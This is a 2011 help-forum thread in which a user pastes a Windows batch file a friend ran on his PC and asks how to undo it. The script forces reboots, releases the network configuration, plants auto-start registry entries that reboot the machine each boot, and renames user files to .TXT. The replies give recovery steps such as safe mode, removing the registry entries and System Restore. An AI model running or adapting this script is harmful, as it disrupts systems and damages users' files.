friend really screwed my pc up using batch

Dell / Inspiron 9100...
May 4, 2011 at 17:38:40
Specs: Windows XP, 3.192 GHz / 1023 MB
ok a friend was using my pc while i was away and he said a batch file popped up, and then started doing a ton of wierd stuff so i located the batch file on a hacker website of all places and this made me feel really stupid for letting him use my comp. anyways here is the code that messed my pc up


@echo off
title SYSTEM MELTDOWN
color 0C
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOUR COMPUTER IS MELTING DOWN *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE


is there a way i can undo what this batch file did. is there another batch file i can make to basically undo what this one did? if so can you post a code. reinstalling my OS is not an option and for some reason the batch file runs even when i plug my hard drive into a sata to usb converter it runs automaticallly? anyways i jsut want to make another batch file to undo what this one did.


See More: friend really screwed my pc up using batch

Report •

#1
May 5, 2011 at 00:02:41
Start the pc into safe mode, you should be able to delete the scripts and remove the start up registry entries:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"startAPI"
"HAHAHA"
"WINDOWsAPI"
"CONTROLexit"

The renaming could be a little bit of a problem, or not depending on where is was run from.


Report •

#2
May 5, 2011 at 18:04:49
according to my friend he says the batch file moved from one folder to another until it performed certain actions in each folder on my computer... i swear he did it on purpose but still i just want to get it fixed, right now im using my laptop and its an old dell inspiron 9100 with dual core 3.2 ghz cpu. which cant do nearly what i want it to ya know. so i really want my 4,000$ computer back and running seeing as a JUST got the damn thing... so any ideas how to undo what it did completely.

Report •

#3
May 6, 2011 at 00:06:46
Well the script you posted isn't complete, so it's hard to tell exactly what it did, the script you posted shouldn't even pass "GOTO CRASH"....


What about a system restore from safe mode?

http://support.microsoft.com/kb/304449


Report •

Related Solutions

#4
May 6, 2011 at 07:44:18
your friend is a punk. just with the renaming of the files. the rest isnt so bad. If the system restore doesnt work. try doing a file search and see what got modified durring the time that it was run. because half your file got renamed to a txt file. exspecially look at the com and bat file, as these could be essentials.

mike


Report •

Ask Question